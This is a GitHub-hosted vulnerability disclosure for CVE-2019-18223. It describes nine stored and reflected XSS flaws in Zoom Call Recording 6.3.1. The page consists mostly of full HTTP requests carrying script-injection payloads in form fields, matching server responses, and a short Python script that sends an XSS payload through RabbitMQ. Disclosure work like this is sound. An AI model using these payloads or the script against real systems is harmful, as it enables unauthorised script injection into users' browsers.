Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Disclosures/CVE-2019-18223-XSS-ZoomCallRecording/
Disclosures/CVE-2019-18223-XSS-ZoomCallRecording/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

CVE-2019-18223-XSS-ZoomCallRecording

Zoom Call Recording 6.3.1 from ZOOM International suffers from multiple XSS vulnerabilities via:

  • the phoneNumber field in the (1) User Edit or (2) User Add form
  • (3) name field in the Role Add form
  • (4) name or number field in the Edit Group form
  • (5) tagKey or tagValue field in the Recording Rules Configuration
  • (6) txt_69735:/VemailAddress/value or txt_75767:/VemailFrom/value field in callrec/config
  • (7) selectedMenuId field in callrec/config
  • (8) xmlPath field in callrec/config
  • (9) escaping the textarea in callrec/logs_view.jsp

Evidence

XSS(1) - Stored XSS in “/callrec/userEditAction.do” page

Request:

POST /callrec/userEditAction.do 
HTTP/1.1 Host: xxx.xxxxxxx.net 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: https://xxx.xxxxxxx.net/callrec/user_edit.jsp?userId=5&roleId=3 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 329 Cookie: JSESSIONID=0724AC780C8C2535253EFD6ADBB16E55 
Connection: close Upgrade-Insecure-Requests: 1 

org.apache.struts.taglib.html.TOKEN=10a6ccd1d842ac1ff64bc645fd053ea8&login2=XXXXXX&firstName=xxx+-+xxxxxx&lastName=xxxxx&email=xxx-xxxxxxx.xxx%40xxx.ro&phoneNumber=<script>alert('XSS')</script>&ldapUser=on&roleId=3&viewRoleId=&loginOriginal=XXXXXX&roleIdOriginal=3&ldapUserOriginal=LDAP&phoneNumberOriginal=&userId=5&ldapOriginal=true

Response:

HTTP/1.1 200 OK 
Date: Wed, 09 Oct 2019 08:09:16 GMT 
Server: Apache Content-Type: text/html;charset=utf-8 
Vary: Accept-Encoding 
Content-Length: 9959 
Connection: close 

***TRUNCATED***
            <img src="images/icon-admin.png" width="16" height="16" alt=""><strong>XXXXXX</strong>
            
              </a>
            
          </td>
          <td class="left soft_wrap">
            Marin
          </td>
          <td class="left soft_wrap">
              XXX - XXXXXXXX
          </td>
          <td class="number wrap">
              <script>alert('XSS');</script>
          </td>
          
            <td style="text-align:center;">
              <img src="images/icon-check.png" alt=""/>
***TRUNCATED***

XSS(2) - Stored XSS in “/callrec/userAddAction.do” page

Request:

POST /callrec/userAddAction.do HTTP/1.1
Host: xxx.xxxxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxxxx.net/callrec/user_add.jsp?viewRoleId=8
Content-Type: application/x-www-form-urlencoded
Content-Length: 334
Cookie: JSESSIONID=DD8E62B3FC844E4EFAA01439E6194493; m=2258:Y2FsbHJlYzpjYWxscmVj
Connection: close
Upgrade-Insecure-Requests: 1

org.apache.struts.taglib.html.TOKEN=7e772bb6a1e21d529fe4fa86010b5b62&roleId=8&viewRoleId=8&dispatch=addUser&groupLdapUsers=&login2=TTTTTTTTTTTTTT&password2=Qwerty1234&passwordVerify=Qwerty1234&firstName=qqqqqqqqqqq&lastName=bbbbbbbbbb&email=&phoneNumber=<script>alert("XSSNumber")</script>&value%28filter_1%29=-1&value%28conj_1%29=END

Response:

HTTP/1.1 200 OK
Date: Mon, 21 Oct 2019 08:45:17 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 10957
Connection: close

***TRUNCATED***
            <img src="images/icon-admin.png" width="16" height="16" alt=""><strong>XXXXXX</strong>
            
              </a>
            
          </td>
          <td class="left soft_wrap">
            Marin
          </td>
          <td class="left soft_wrap">
              XXX - XXXXXXXXX
          </td>
          <td class="number wrap">
              <script>alert('XSS');</script>
          </td>
          
            <td style="text-align:center;">
              <img src="images/icon-check.png" alt=""/>
***TRUNCATED***

XSS(3) - Stored XSS in “/callrec/roleAddAction.do” page

Request:

POST /callrec/roleAddAction.do HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/roleAddAction.do
Content-Type: application/x-www-form-urlencoded
Content-Length: 385
Cookie: JSESSIONID=DD8E62B3FC844E4EFAA01439E6194493; m=2258:Y2FsbHJlYzpjYWxscmVj
Connection: close
Upgrade-Insecure-Requests: 1

org.apache.struts.taglib.html.TOKEN=7e772bb6a1e21d529fe4fa86010b5b62&userId=5&dispatch=add&viewRoleId=3&name=<script>alert("XSSName")</script>&roleParentId=3&number=bbbbbbbbbbbbb&actionId=9&actionId=11&actionId=8&actionId=7&actionId=10&actionId=4&actionId=6&actionId=1&actionId=16&viewId=9%7C11%7C8%7C7%7C10%7C4%7C6%7C1%7C16%7C&description=&value%28filter_1%29=-1&value%28conj_1%29=END

XSS(4) - Stored XSS in “/callrec/roleEditAction.do” page

Request:

POST /callrec/roleEditAction.do HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/group_edit.jsp?viewRoleId=8
Content-Type: application/x-www-form-urlencoded
Content-Length: 451
Cookie: JSESSIONID=DD8E62B3FC844E4EFAA01439E6194493; m=2258:Y2FsbHJlYzpjYWxscmVj
Connection: close
Upgrade-Insecure-Requests: 1

org.apache.struts.taglib.html.TOKEN=7e772bb6a1e21d529fe4fa86010b5b62&userId=5&originalName=%3Cscript%3Ealert%28%22XSSName%22%29%3C%2Fscript%3E&roleId=8&name=<script>alert("XSSName")</script>&parentId=3&number=<script>alert("XSSNumber")</script>&actionId=9&actionId=11&actionId=8&actionId=7&actionId=10&actionId=4&actionId=6&actionId=1&actionId=16&viewId=9%7C11%7C8%7C7%7C10%7C4%7C6%7C1%7C16%7C&description=&value%28filter_1%29=-1&value%28conj_1%29=END

XSS(5) - Stored XSS in “/callrec/recRulesEditAction.do” page

Request:

POST /callrec/recRulesEditAction.do HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/recording_rules_edit.jsp?viewRoleId=1&ruleId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 398
Cookie: scroolY=0; JSESSIONID=BDFA58A8B635ED02BFDEE14CCFCD6104; m=
Connection: close
Upgrade-Insecure-Requests: 1

org.apache.struts.taglib.html.TOKEN=6188a4d2a8a71e769b9f3137585246d0&ruleId=1&roleId=1&policy=RECORD&typeRule=PHONE&mask=7561&probability=100&dayOfWeek=1&dayOfWeek=2&dayOfWeek=3&dayOfWeek=4&dayOfWeek=5&dayOfWeek=6&dayOfWeek=7&timeFrom=00%3A00&timeTo=24%3A00&active=on&screenRECProbability=100&addTag=on&tagKey="><script>alert('XSSTagKey')</script><&tagValue="><script>alert('XSSTagValue')</script><

XSS(6) - Stored XSS in “/callrec/config” page

Request:

POST /callrec/config HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/config.jsp?selectedModule=tools&selectedMenuId=menu_tools&selectedMenuOption=config/specified/tools/cz_zoom_callrec_tools_disk_space/view.jsp&specifiedConfiguration=disk_space
Content-type: application/x-www-form-urlencoded
Content-Length: 202
Cookie: scroolY=0; JSESSIONID=2C0E0A265B23D61CFC97E49068370C2F; m=
Connection: close

action=save&chb_69733:/VenabledEmail/value=false&chb_69734:/VenabledSNMP/value=false&txt_69735:/VemailAddress/value=asdsaddasdsadd"><script>alert('XSS')</script><&txt_69736:/VdaysLeftWhenNotify/value=20

Request:

POST /callrec/config HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/config.jsp?selectedModule=core&selectedMenuId=menu_core&selectedMenuOption=config/specified/core/cz_zoom_callrec_core_callstorage/view.jsp&specifiedConfiguration=smtp
Content-type: application/x-www-form-urlencoded
Content-Length: 157
Cookie: scroolY=0; JSESSIONID=712211C38CA7012B06C10BB1933D5B67; m=
Connection: close

action=save&txt_75766:/VsmtpAddress/value=127.0.0.1&txt_75767:/VemailFrom/value=callrec%40xxxxx.xxxxxxx.xxxxxx"><script>alert("SMTPConf")</script><

XSS(7) - Reflected XSS in “/callrec/config” page via direct JS injection

Request:

GET /callrec/config.jsp?selectedModule=drivers&selectedMenuId='-alert('selectedMenuId')-'&selectedMenuOption=config/specified/drivers/cz_zoom_callrec_driver_genesys/view.jsp&specifiedConfiguration=genesysDriver HTTP/1.1
Host: xxx.xxxxxxx.net
Cookie: JSESSIONID=4D***TRUNCATED***39

Response:

HTTP/1.1 200 OK
Date: Mon, 28 Oct 2019 09:13:10 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 24468

***TRUNCATED***

/** Show the menu for the selected module.  **/
		function showSelectedModuleMenu() {
		var menuId = ''-alert('selectedMenuId')-'';
setMenuContent(menuId);
document.getElementById("drivers").className = "selected";
		}
	</script>

***TRUNCATED***

XSS(8) - Reflected XSS in “/callrec/config” page via XML Script Element

Request:

POST /callrec/config HTTP/1.1
Host: xxx.xxxxx.net
Content-type: application/x-www-form-urlencoded
Content-Length: 137
Cookie: JSESSIONID=4D***TRUNCATED***39

action=removeEntry&xmlPath=/Eserver/aaa/]]><script+xmlns="http://www.w3.org/1999/xhtml"><![CDATA[+alert('xmlPath');+]]></script><![CDATA[

Response:

HTTP/1.1 200 OK
Date: Mon, 28 Oct 2019 09:23:41 GMT
Server: Apache
Content-Type: text/xml;charset=utf-8
Content-Length: 1702
Vary: Accept-Encoding

<?xml version="1.0"?>
<root>
<action>forward</action>
<resultType>error</resultType>
<message><![CDATA[<h1 style="font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px">AJAX Config Servlet Error</h1><HR size="1" noshade="noshade"><p><b>Message: </b><u>Removing object operation failed.</u></p><p><b>Exception: </b><pre>java.lang.IllegalAccessException: XmlPath is invalid (/Eserver/aaa/]]><script xmlns="http://www.w3.org/1999/xhtml"><![CDATA[ alert('xmlPath'); ]]></script><![CDATA[). Error is at "aaa" element. Cause: Equal group not found. Specification is not number and equal group with this name does not exist.

***TRUNCATED***

XSS(9) - Stored XSS in “/callrec/logs_view.jsp” page via RabbitMQ

The logging textarea used by ZoomCallRecording to log AMQP messages can be escaped and allows an attacker to inject arbitrary HTML/JS content by sending malicious messages to the RabbitMQ component.

Python script for sending XSS payload via AMQP:

#!/usr/bin/python

import pika, os, logging, sys
logging.basicConfig()

username = sys.argv[1]
password = sys.argv[2]
target_ip = sys.argv[3]
queueName = sys.argv[4]

url = os.environ.get("Test", 'amqp://%s:%s@%s/' % (username, password, target_ip) + '%2f')
params = pika.URLParameters(url)
params.socket_timeout = 5

xss = "</textarea><script>alert('index_frame.jsp - Log Textarea')</script>"

connection = pika.BlockingConnection(params)
channel = connection.channel()
channel.basic_publish(exchange='', routing_key=queueName, body=xss)
print ("[x] "+xss+" sent to consumer")

Request:

POST /callrec/logs_view.jsp HTTP/1.1
Host: xxx.xxxxx.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
Cookie: JSESSIONID=69***TRUNCATED***61

selLogIdx=28&page=0

Response:

HTTP/1.1 200 OK
Date: Mon, 28 Oct 2019 09:33:47 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 37074

***TRUNCATED***

                <textarea id="copytext">
                    fa329ff3700] ucl.threads.BoostThread - Thread process threw error: Opening TCP socket to [amqp://<IP>:5672]: a socket error occurred
Oct 24 10:11:31 ERROR [0x7fa3297f2700] ucl.threads.BoostThread - Thread process threw 

***TRUNCATED***

Oct 24 15:17:44 WARN  [0x7fa3137fe700] ucl.rec.RecorderRequestsHandler - Failed to get recording message for received amqp message: AmqpMessage{priority:0,delivery_mode:1,payload:</textarea><script>alert('index_frame.jsp - Log Textarea')</script>}

                </textarea>